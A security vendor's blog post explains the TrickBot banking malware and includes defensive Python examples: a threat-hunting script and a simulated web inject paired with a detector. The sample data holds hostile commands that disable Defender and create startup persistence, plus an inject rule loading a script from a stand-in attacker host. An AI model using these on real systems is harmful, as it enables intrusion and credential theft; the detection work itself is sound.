
Trickbot, not just an ordinary hat trick

posted by: Paula Boyden date: Apr 29, 2021 category: All comments: 0

With almost everything going digital nowadays, the threat posed by malware is at an all-time high, and every business that conducts online transactions needs to know how to protect itself. TrickBot is one malware family that deserves close attention today.


What is TrickBot?

TrickBot originated as a banking Trojan built for credential theft. Today it is a modular malware enterprise armed with advanced system reconnaissance, persistence capabilities, and a well-documented association with follow-on ransomware attacks. The MS-ISAC continuously monitors its threats and capabilities on behalf of MS-ISAC members.


A Quick Background Check

TrickBot is considered a distant successor of the ZeuS banking Trojan, which first appeared in 2007 and evolved from there. More directly, it is traced back to Dyre (also known as Dyreza), which went offline in 2015.

TrickBot emerged in 2016 containing elements of Dyre's code, retaining the ability to harvest banking credentials together with the web inject infrastructure. Today TrickBot is a malware enterprise with many plugin modules, persistence capabilities, crypto mining, and an evolving relationship with ransomware infections. At the beginning of June 2019, the MS-ISAC noticed a significant relationship between TrickBot infections and Ryuk ransomware attacks, and in 2020 the malware drew the concerted attention of both government and private entities.


TrickBot’s Technical Features

TrickBot is primarily disseminated through malspam campaigns, or dropped by other malware such as Emotet (itself dismantled in January 2021). Malspam lures used to deliver TrickBot have included holiday greeting cards, invoices, traffic violation notices, and even the COVID-19 pandemic.

While security researchers have observed various infection vectors, the usual source remains malspam, and that malspam typically carries malicious macro-laden Office documents.

When the malicious link or document is opened, the end user is prompted to enable macros, which then run a base64-obfuscated VBScript. That script downloads the initial TrickBot binary from an external server. TrickBot also uses public resources such as icanhazip[.]com[3] to learn the victim's external IP address. After execution, TrickBot writes itself to disk in the %AppData%\Roaming folder and then unpacks its files using an encoded and obfuscated bot key that is unique to the infected computer.

TrickBot also attempts to disable any antivirus protection present on the system, such as Windows Defender. Once that is done, it creates a scheduled task that runs at system startup to ensure persistence.

With these initial steps complete, TrickBot can receive and update commands and bot configurations. It can also load further plugin modules, delivered as dynamic link library (DLL) files stored in the malware's Data folder; the unique bot key associated with the machine is used to decrypt these follow-on DLL plugins. In 2019, security researcher Vitali Kremez reported that TrickBot could also perform a User Account Control (UAC) bypass on both Windows 7 and Windows 10, allowing it to run commands and make system changes without any prompt or user authorisation.
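As an added example (not part of the original post, and not TrickBot, MS-ISAC or FraudWatch code), the chain described above can be turned into hunting logic. The script below parses constructed, Sysmon-style process, DNS and file events written in a simple key=value format and flags each stage: an Office process spawning a script host, encoded PowerShell, a non-browser process querying an external-IP service, an executable written under AppData\Roaming, a Defender tamper command, and a scheduled task registered for startup. The host names, paths and the WinNetUpdate task name are invented for illustration, and the rules are heuristics rather than a signature.

```python
"""Hunt for the TrickBot-style infection chain in endpoint telemetry.

Added example: the events below are constructed, Sysmon-like records in a simple
key=value format, not real logs, and the rules are illustrative heuristics.
"""
import re
from collections import defaultdict

SAMPLE_EVENTS = [
    # Word spawns a script host after the user enables macros
    'host=WS01 type=ProcessCreate parent=WINWORD.EXE image=wscript.exe '
    'cmd="wscript.exe C:\\Users\\a\\AppData\\Local\\Temp\\invoice.vbs"',
    # the VBScript runs base64-encoded PowerShell to fetch the binary
    'host=WS01 type=ProcessCreate parent=wscript.exe image=powershell.exe '
    'cmd="powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"',
    # external IP discovery from a non-browser process
    'host=WS01 type=DnsQuery image=invoice.exe query=icanhazip.com',
    # binary dropped under %AppData%\Roaming (hypothetical folder name)
    'host=WS01 type=FileCreate image=powershell.exe '
    'target=C:\\Users\\a\\AppData\\Roaming\\WinNetUpdate\\invoice.exe',
    # Defender real-time protection switched off
    'host=WS01 type=ProcessCreate parent=invoice.exe image=powershell.exe '
    'cmd="powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true"',
    # persistence via a startup scheduled task
    'host=WS01 type=ProcessCreate parent=invoice.exe image=schtasks.exe '
    'cmd="schtasks.exe /create /tn WinNetUpdate /sc onstart /tr C:\\Users\\a\\AppData\\Roaming\\WinNetUpdate\\invoice.exe"',
    # benign control: a browser looking up its public IP must not fire
    'host=WS02 type=ProcessCreate parent=explorer.exe image=chrome.exe cmd="chrome.exe"',
    'host=WS02 type=DnsQuery image=chrome.exe query=icanhazip.com',
]

KV_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "powershell.exe", "mshta.exe"}
IP_LOOKUP_SITES = {"icanhazip.com", "checkip.amazonaws.com", "ipinfo.io",
                   "myexternalip.com", "wtfismyip.com"}
BROWSERS = {"chrome.exe", "firefox.exe", "msedge.exe", "iexplore.exe"}


def parse_event(line):
    """Parse one key=value line; quoted values may contain spaces."""
    return {key: quoted or bare for key, quoted, bare in KV_RE.findall(line)}


def rule_office_macro(e):
    return (e.get("type") == "ProcessCreate"
            and e.get("parent", "").lower() in OFFICE
            and e.get("image", "").lower() in SCRIPT_HOSTS)


def rule_encoded_powershell(e):
    # -e / -ec / -enc / -encodedcommand followed by a base64 blob
    return (e.get("image", "").lower() == "powershell.exe" and re.search(
        r"\s-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", e.get("cmd", ""), re.I) is not None)


def rule_external_ip_lookup(e):
    return (e.get("type") == "DnsQuery"
            and e.get("query", "").lower() in IP_LOOKUP_SITES
            and e.get("image", "").lower() not in BROWSERS)


def rule_roaming_dropper(e):
    target = e.get("target", "").lower()
    return (e.get("type") == "FileCreate" and "\\appdata\\roaming\\" in target
            and target.endswith((".exe", ".dll")))


def rule_defender_tamper(e):
    cmd = e.get("cmd", "").lower()
    return ("set-mppreference" in cmd and "-disable" in cmd) or "disableantispyware" in cmd


def rule_startup_task(e):
    cmd = e.get("cmd", "").lower()
    return (e.get("image", "").lower() == "schtasks.exe" and "/create" in cmd
            and re.search(r"/sc\s+(onstart|onlogon)", cmd) is not None)


RULES = [
    ("office_macro_spawn", rule_office_macro),
    ("encoded_powershell", rule_encoded_powershell),
    ("external_ip_lookup", rule_external_ip_lookup),
    ("roaming_dropper", rule_roaming_dropper),
    ("defender_tamper", rule_defender_tamper),
    ("startup_task", rule_startup_task),
]


def hunt(lines):
    """Return {host: [rule names hit, in order of first hit]}."""
    hits = defaultdict(list)
    for line in lines:
        event = parse_event(line)
        host = event.get("host", "unknown")
        for name, rule in RULES:
            if rule(event) and name not in hits[host]:
                hits[host].append(name)
    return dict(hits)


def triage(hits, threshold=3):
    """A host matching several chain stages is far more suspicious than one stray hit."""
    return {host: len(rules) for host, rules in hits.items() if len(rules) >= threshold}


if __name__ == "__main__":
    for host, rules in hunt(SAMPLE_EVENTS).items():
        print(host, len(rules), rules)
```

Any single rule fires on benign activity now and then (administrators also register startup tasks, and plenty of software writes to AppData\Roaming), which is why triage counts how many stages of the chain a single host has exhibited rather than alerting on one match.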


TrickBot As A Credential Thief

TrickBot is not just any ordinary malware. It uses web injects to acquire banking credentials and steal browser cookies. There are two types of web injects utilised by TrickBot:

  • Static injection or redirection attacks

The malware redirects the user to a fraudulent copy of the banking site under the attacker's control. When the victim logs in to this fake site, the malware captures the login details.

  • Dynamic injection or server-side injections

The malware intercepts the response from the bank's server inside the victim's browser and fetches additional code from a server run by the cyber threat actor (CTA). That code is added to the genuine webpage before it is rendered for the client, so the page still appears to come from the bank over a valid TLS connection. The CTAs then harvest the victim's banking information with form-grabbers that capture what is typed into the modified page.
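To make the dynamic injection mechanism concrete, here is an added example that is constructed for this post and is not TrickBot code or a real bank page. It applies a ZeuS-style inject rule (the set_url / data_before / data_inject / data_after format popularised by ZeuS and reused by later banking Trojans, with simplified semantics here) to a constructed login page, and then runs the kind of page-integrity check a bank's own script or a synthetic monitor could perform: compare the form fields and script sources actually present against the set the bank expects. The bank.example and cta.example hosts, the rule, the page and the "pin" field are all invented.

```python
"""Simulated dynamic web inject and a page-integrity check.

Added example with constructed data: the bank page, inject rule and host names are
invented, and the inject semantics are a simplified ZeuS-style rule.
"""
import re
from html.parser import HTMLParser

BANK_LOGIN_PAGE = """<html><body>
<form id="login" action="/auth" method="post">
  <input name="username" type="text">
  <input name="password" type="password">
  <button type="submit">Sign in</button>
</form>
</body></html>"""

# ZeuS-style rule: when the URL matches set_url, insert data_inject right after
# data_before (and only if data_after, when given, follows). The payload here is a
# placeholder: an extra "pin" field plus a script tag pointing at an attacker host.
INJECT_RULE = {
    "set_url": "https://bank.example/login*",
    "data_before": '<input name="password" type="password">',
    "data_inject": '\n  <input name="pin" type="text">'
                   '\n  <script src="https://cta.example/grab.js"></script>',
    "data_after": "",
}


def url_matches(url, pattern):
    """Glob match with '*' as the only wildcard, as inject configs use."""
    regex = re.escape(pattern).replace(r"\*", ".*")
    return re.fullmatch(regex, url) is not None


def apply_inject(url, html, rule):
    """What the bot does inside the browser: modify the decrypted response body.
    TLS does not protect against this; the page is altered after decryption."""
    if not url_matches(url, rule["set_url"]):
        return html
    start = html.find(rule["data_before"])
    if start < 0:
        return html
    start += len(rule["data_before"])
    if rule["data_after"] and html.find(rule["data_after"], start) < 0:
        return html
    return html[:start] + rule["data_inject"] + html[start:]


class FormAudit(HTMLParser):
    """Collect (form id, input name) pairs and script sources from a page."""

    def __init__(self):
        super().__init__()
        self.inputs, self.scripts, self._form = [], [], None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._form = a.get("id")
        elif tag == "input" and self._form:
            self.inputs.append((self._form, a.get("name")))
        elif tag == "script":
            self.scripts.append(a.get("src", "inline"))

    def handle_endtag(self, tag):
        if tag == "form":
            self._form = None


# What the bank expects its login page to contain (this toy page has no scripts).
EXPECTED = {"inputs": {("login", "username"), ("login", "password")}, "scripts": set()}


def detect_injection(html, expected=EXPECTED):
    """Report form fields and script sources not in the expected set."""
    audit = FormAudit()
    audit.feed(html)
    return {
        "unexpected_inputs": sorted(set(audit.inputs) - expected["inputs"]),
        "unexpected_scripts": sorted(set(audit.scripts) - expected["scripts"]),
    }


def audit_post(fields, allowed=frozenset({"username", "password"})):
    """Server-side complement: the /auth handler can flag submissions carrying
    fields the genuine form never had, which an injected field can produce."""
    return sorted(set(fields) - allowed)


if __name__ == "__main__":
    tampered = apply_inject("https://bank.example/login?x=1", BANK_LOGIN_PAGE, INJECT_RULE)
    print(detect_injection(BANK_LOGIN_PAGE))
    print(detect_injection(tampered))
    print(audit_post({"username": "a", "password": "b", "pin": "1234"}))
```

The client-side check is only as trustworthy as the browser it runs in, and the bot controls that browser, so in practice it is delivered as an obfuscated script and paired with server-side signals such as audit_post and behavioural analytics; the example's value is in showing where in the page the injected content lands and why the browser's padlock tells the victim nothing.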


TrickBot is something every bank account user needs to be aware of. The malware has a resilient command and control infrastructure and is equipped with a follow-on exploitation framework. Its many functions are spread across several layers of infrastructure, which is why takedown efforts by government and private entities have not succeeded in eliminating it. This is why a reliable online cybersecurity agency should be engaged to protect business brands from cyber threats like TrickBot.


At FraudWatch International we have been dedicated to protecting our clients' brands all over the world since 2003. For more details, contact us now.
